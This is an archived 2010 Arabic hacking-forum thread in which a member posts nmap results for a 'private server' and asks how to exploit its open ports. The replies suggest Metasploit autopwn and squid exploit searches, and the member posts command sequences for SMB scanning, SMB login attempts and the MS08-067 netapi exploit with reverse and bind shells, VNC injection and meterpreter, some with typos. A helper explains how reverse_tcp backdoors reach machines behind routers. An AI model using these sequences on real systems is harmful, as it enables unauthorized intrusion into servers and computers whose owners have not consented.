التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-17-2010, 09:47 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو






أسدالله الدمشقي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
أسدالله الدمشقي is on a distinguished road

افتراضي غير مجاب: فحص السيرفر


سيرفر خاص هاذا الفحص مالعمل




PORT STATE SERVICE VERSION


80/tcp open http?
3128/tcp open squid-http?
فحص nmapsmilies7



Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC tpw hgsdvtv

التوقيع

تقبري البي يا عمتي
http://www.facebook.com/photo.php?fb...&type=1&ref=nf
لا غالب الا الله
http://www.youtube.com/watch?v=IbwpTOajUV8

 


التعديل الأخير تم بواسطة أسدالله الدمشقي ; 07-17-2010 الساعة 09:49 PM.

   

رد مع اقتباس
قديم 07-17-2010, 11:53 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية data$hack
 

 

 
إحصائية العضو







data$hack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
data$hack is on a distinguished road

افتراضي

التوقيع


data$hack : EIP HUNTER


Ninja-security team
http://Pentest101.blogspot.com

 

   

رد مع اقتباس
قديم 07-18-2010, 11:48 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
إحصائية العضو






أسدالله الدمشقي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
أسدالله الدمشقي is on a distinguished road

افتراضي


Not shown: 997 filtered ports
PORT STATE SERVICE
80/tcp open http
3128/tcp open squid-http
8080/tcp open http-proxy

Nmap done: 1 IP address (1 host up) scanned in 91.97 seconds

Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http?
3128/tcp open squid-http?
8080/tcp open http-proxy?
3 services unrecognized despite returning data. If you know the service/version,
please submit the following fingerprints at http://www.insecure.org/cgi-bin/ser
vicefp-submit.cgi :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=4.76%I=7%D=7/18%Time=4C43417F%P=i686-pc-windows-windows%r(
SF:GetRequest,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Type:\x20tex
SF:t/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Bad\x20Reque
SF:st</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\x20Request
SF:</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY></HTML>\n")
SF:%r(HTTPOptions,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Type:\x2
SF:0text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Bad\x20R
SF:equest</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\x20Req
SF:uest</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY></HTML>
SF:\n")%r(RTSPRequest,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Type
SF::\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Bad\
SF:x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\x2
SF:0Request</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY></H
SF:TML>\n")%r(FourOhFourRequest,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nCo
SF:ntent-Type:\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x204
SF:00\x20Bad\x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400
SF:\x20Bad\x20Request</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .
SF:</BODY></HTML>\n")%r(SIPOptions,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\
SF:nContent-Type:\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x
SF:20400\x20Bad\x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20
SF:400\x20Bad\x20Request</H1>\x20The\x20requested\x20URL\x20is\x20malforme
SF:d\.</BODY></HTML>\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3128-TCP:V=4.76%I=7%D=7/18%Time=4C43417F%P=i686-pc-windows-windows%
SF:r(GetRequest,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Type:\x20t
SF:ext/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Bad\x20Req
SF:uest</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\x20Reque
SF:st</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY></HTML>\n
SF:")%r(HTTPOptions,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Type:\
SF:x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Bad\x2
SF:0Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\x20R
SF:equest</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY></HTM
SF:L>\n")%r(Socks5,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Type:\x
SF:20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Bad\x20
SF:Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\x20Re
SF:quest</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY></HTML
SF:>\n")%r(RTSPRequest,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Typ
SF:e:\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Bad
SF:\x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\x
SF:20Request</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY></
SF:HTML>\n")%r(FourOhFourRequest,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nC
SF:ontent-Type:\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20
SF:400\x20Bad\x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x2040
SF:0\x20Bad\x20Request</H1>\x20The\x20requested\x20URL\x20is\x20malformed\
SF:.</BODY></HTML>\n")%r(SIPOptions,CC,"HTTP/1\.0\x20400\x20Bad\x20Request
SF:\nContent-Type:\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\
SF:x20400\x20Bad\x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x2
SF:0400\x20Bad\x20Request</H1>\x20The\x20requested\x20URL\x20is\x20malform
SF:ed\.</BODY></HTML>\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8080-TCP:V=4.76%I=7%D=7/18%Time=4C43417F%P=i686-pc-windows-windows%
SF:r(GetRequest,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Type:\x20t
SF:ext/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Bad\x20Req
SF:uest</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\x20Reque
SF:st</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY></HTML>\n
SF:")%r(HTTPOptions,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Type:\
SF:x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Bad\x2
SF:0Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\x20R
SF:equest</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY></HTM
SF:L>\n")%r(RTSPRequest,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Ty
SF:pe:\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Ba
SF:d\x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\
SF:x20Request</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY><
SF:/HTML>\n")%r(FourOhFourRequest,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\n
SF:Content-Type:\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x2
SF:0400\x20Bad\x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x204
SF:00\x20Bad\x20Request</H1>\x20The\x20requested\x20URL\x20is\x20malformed
SF:\.</BODY></HTML>\n")%r(Socks5,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nC
SF:ontent-Type:\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20
SF:400\x20Bad\x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x2040
SF:0\x20Bad\x20Request</H1>\x20The\x20requested\x20URL\x20is\x20malformed\
SF:.</BODY></HTML>\n")%r(SIPOptions,CC,"HTTP/1\.0\x20400\x20Bad\x20Request
SF:\nContent-Type:\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\
SF:x20400\x20Bad\x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x2
SF:0400\x20Bad\x20Request</H1>\x20The\x20requested\x20URL\x20is\x20malform
SF:ed\.</BODY></HTML>\n");

Service detection performed. Please report any incorrect results at http://nmap.
org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 136.15 seconds

التوقيع

تقبري البي يا عمتي
http://www.facebook.com/photo.php?fb...&type=1&ref=nf
لا غالب الا الله
http://www.youtube.com/watch?v=IbwpTOajUV8

 

   

رد مع اقتباس
قديم 07-18-2010, 11:58 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو






أسدالله الدمشقي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
أسدالله الدمشقي is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة data$hack
::: METASPLOIT TRANNING ::: مقدمة , توضيحات و فهرس
[الدرس] دروس المجهووول للميتاسبلوت

أخي الكريم حياك الله وانا متشكر ردك اخي بهذي السرعة وانا تابعت كل الدروس للروابط الي انت عطيتني ياها
ولاكن انا فحصت السيرفر
80/tcp open http
3128/tcp open squid-http
8080/tcp open http-proxy
وطلعت البورتات المفتوحة هدول فقط كيف بدي استغل البورتات هدول شوفت عينك السيرفر خاص للعلم
وجزيل الشكر اخي الكريم بالمناسبة موضوع المجهول روعة smilies14

التوقيع

تقبري البي يا عمتي
http://www.facebook.com/photo.php?fb...&type=1&ref=nf
لا غالب الا الله
http://www.youtube.com/watch?v=IbwpTOajUV8

 

   

رد مع اقتباس
قديم 07-18-2010, 01:51 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية data$hack
 

 

 
إحصائية العضو







data$hack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
data$hack is on a distinguished road

افتراضي


::: METASPLOIT TRANNING ::: مقدمة , توضيحات و فهرس
use autopwn

or you can search manual

search squid

التوقيع


data$hack : EIP HUNTER


Ninja-security team
http://Pentest101.blogspot.com

 


التعديل الأخير تم بواسطة data$hack ; 07-18-2010 الساعة 02:03 PM.

   

رد مع اقتباس
قديم 07-19-2010, 04:47 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
إحصائية العضو






أسدالله الدمشقي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
أسدالله الدمشقي is on a distinguished road

افتراضي


.


search portscan
use scanner/portscan/tcp
show options
set rhosts 192.168.1.102
run
الدرس الثاني
use scanner/smb/version
show options
set RHOST 192.168.1.102
run
الدرس الثالث
show auxiliary
use scanner/smb/login
show options
set RHOSTS 192.168.1.0-10
set SMBUser pentest
run
إنتهى
use windows/smp/ms88_067_netapi
show options
set RHOST 192.168.1.102
set payload windows/shell/reverهذا الأمر يمكن بدل reverse الأخير
show options
set RHOST 192.168.1.3
exploit
الإقتحام
ipconfig
الدرس الي بعدو
use windows/smp/ms88_067_netapi
show options
set RHOST 192.168.1.102
set payload windows/shell/bind
show options
exploit
ipconfig
الدرس الذي يليه
use windows/smp/ms88_067_netapi
show options
set RHOST 192.168.1.102
set payload windows/vncinject/reverse_tcp
show options
set lHOST 192.168.1.103
exploit

تم الأقتحام
use windows/smp/ms88_067_netapi
show options
set RHOST 192.168.1.102
set payload windows/meterpreter/reverse_tcpoit
show options
set lHOST 192.168.1.103
exploit
help
ps
meterpreter >>migrate 1544
أخي الحبيب بوركت بجد وجزيل الشكر على الدروس والخلاصة منهم انا بكمل دروسك وبرجع بأستفسارات معينة
ان شاء الله

التوقيع

تقبري البي يا عمتي
http://www.facebook.com/photo.php?fb...&type=1&ref=nf
لا غالب الا الله
http://www.youtube.com/watch?v=IbwpTOajUV8

 

   

رد مع اقتباس
قديم 07-19-2010, 04:51 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
إحصائية العضو






أسدالله الدمشقي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
أسدالله الدمشقي is on a distinguished road

افتراضي


::: METASPLOIT TRANNING ::: مقدمة , توضيحات و فهرس
use autopwn

اخي الكريم انت اخبرتني تابع هذا ورح اتابعه
ولاكن بالدروس الي قبل هذا اخي الكريم
انت تخترق داخل نطاق الشبكة الداخلية اي تحت الراوتر طيب لو نحنا بدنا نخترق خارج الشبكة ماذا نعم هوه سؤال بسيط وجوابه اسهل نأخذ الأيبي الحقيقي للجهاز ولاكن سؤالي هل تنفع في الشبكة الخارجية وأعتذر منك لأني كنت بطبق على الشبكة الداخلية وتمام
مشي الحال ولاكن اليوم فرمتت ولم تسنح لي الفرصة اجرب خارج نطاق الشبكة الداخلية جزيل الشكر مرة اخرى

التوقيع

تقبري البي يا عمتي
http://www.facebook.com/photo.php?fb...&type=1&ref=nf
لا غالب الا الله
http://www.youtube.com/watch?v=IbwpTOajUV8

 

   

رد مع اقتباس
قديم 07-19-2010, 09:50 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية data$hack
 

 

 
إحصائية العضو







data$hack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
data$hack is on a distinguished road

افتراضي


تستطيع الاختراق خارج الشبكة بشروط :
اذا كنت مستهدف سرفر . لان السرفر يكون الip ثابت .
تستطيع اختراق جهاز شرط(يكون الip ثابت).
تستطيع اختراق جهاز خلف router باستخدام payload reverse_tcp
يعني backdoor reverse connection
windows/meterpreter/reverse_tcp
or
windows/shell/reverse_tcp
or
linux
METASPLOIT : linux/x86 backdoor

التوقيع


data$hack : EIP HUNTER


Ninja-security team
http://Pentest101.blogspot.com

 

   

رد مع اقتباس
قديم 07-19-2010, 09:52 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية data$hack
 

 

 
إحصائية العضو







data$hack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
data$hack is on a distinguished road

افتراضي


اتمنى اكون ساعدتك

التوقيع


data$hack : EIP HUNTER


Ninja-security team
http://Pentest101.blogspot.com

 

   

رد مع اقتباس
قديم 07-20-2010, 11:51 AM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
إحصائية العضو






أسدالله الدمشقي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
أسدالله الدمشقي is on a distinguished road

افتراضي


بوركت اخي الحبيب وحياك الله وجزيل الشكر بالفعل ساعدتني وجزيل الشكر
هذا اخي
امر تشغيل أداة dmitry فحص السيرفر رائع عليها شوفها يمكن بتعرفها ولكن حبيت ابادلك بشي من اي شي علمتني ايا
مشكور اخي

dmitry -winsepffb -o host.txt google.com

التوقيع

تقبري البي يا عمتي
http://www.facebook.com/photo.php?fb...&type=1&ref=nf
لا غالب الا الله
http://www.youtube.com/watch?v=IbwpTOajUV8

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
نو برايفت [ شـرح تخطي حماية حظر البيرل على السيرفر وتشغليه غصبا عن انف السيرفر ^_^ ] The Final Doom قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 21 03-20-2017 03:11 PM
طــريقة أستخـراج Ip السيرفر ومشــاهدة المواقع التي على السيرفر .. IVIr-I-Iaker قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 7 03-12-2015 11:20 AM
أريد طريقة لدمج السيرفر بصورة وعند فتح الصورة يفتح السيرفر med-wed جـــ'ابات العناكــ'ب 8 09-04-2011 09:38 AM
هل السيرفر يعمل؟؟؟ hglvuf جـــ'ابات العناكــ'ب 5 06-28-2010 10:53 AM
برنامج turkojan4 معرب + نبد عن تكوين السيرفر + برنامج تشفير السيرفر مغربي قســم إختــراق الأجهــزة 23 07-07-2008 10:39 PM


الساعة الآن 08:59 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0